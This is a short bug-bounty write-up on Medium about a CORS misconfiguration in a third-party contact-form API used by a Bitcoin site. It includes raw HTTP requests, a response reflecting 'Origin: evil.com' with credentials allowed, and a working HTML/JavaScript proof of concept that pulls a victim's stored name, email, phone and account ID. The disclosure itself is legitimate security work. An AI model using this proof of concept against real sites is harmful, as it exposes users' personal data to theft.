Exploiting Misconfigured CORS on popular BTC Site

Arbaz Hussain
Jul 19, 2017 · 2 min read

Severity: Medium

Complexity : Easy

Weakness : Allowing ACAH


On one of the popular BTC site , I was facing some issue with account so i used the’r support form to inform them .

Thing’s i Provided By form :

  1. Email .
  2. Phone Number.
  3. Name.
  4. Message.

Clicked on Submit and Noticed that Form is being sent to third party site .

https://api.thirdparty.com/api/contact/widget/281d02/ in form of POST Data .

POST /api/contact/widget/281d02/ HTTP/1.1
Host: api.thirdparty.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.8
Cookie: REDACTED
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

{“firstName”:”adsgasgsag”,”lastName”:null,”company”:null,”email”:”asgasgasgn1241@gmail.com”,”phone”:”9876543210",”accountId”:”38517",”message”:”xxx”,”Tags”:[]}


  • After Sending form i changed the request Method to GET ,
  • Added Origin: evil.com in Request Header

GET /api/contact/widget/281d02/ HTTP/1.1
Origin: evil.com

  • Response :

Access-Control-Allow-Origin: evil.com
Access-Control-Allow-Credentials: true

{"contactUid":"025381","firstName":"adsgasgsag","lastName":null,"company":null,"email":"asgasgasgn1241@gmail.com","phone":"9123091647","additionalDetails":{},"accountId":38517,”location”:null,”Tags”:[]}

  • Surprised to see Access-Control-Allow-Credentials: true

<html>
<body onload=’load()’>
<p id=”demo”></p>Name: <h3 id=”name”></h3>
Email : <h3 id=”email”></h3>
Phone : <h3 id=”phone”></h3>
ACCID :<h3 id=”AccountID”></h3>
<h3 id=”que”></h3>
<script>
function load(){
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function(){
if(this.readyState == 4 && this.status == 200){
//document.getElementById(‘demo’).innerHTML = JSON.stringify(this.responseText);
parsed = JSON.parse(this.responseText);
var arr = [];
for(var x in parsed){
arr.push(parsed[x]);
}
console.log(arr)
document.getElementById(‘email’).innerHTML = arr[6];
document.getElementById(‘name’).innerHTML = arr[3];
document.getElementById(‘phone’).innerHTML = arr[7];
document.getElementById(‘AccountID’).innerHTML = arr[9];
}
};
xhr.open(“GET”,”https://api.thirdparty.com/api/contact/widget/281d02",true);
xhr.send();
}
</script></body>
</html>
poc
  • As Soon as victim(user who used the’r support form at anytime or any previous date) visit’s malicious page . His previous form data get’s extracted .
Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade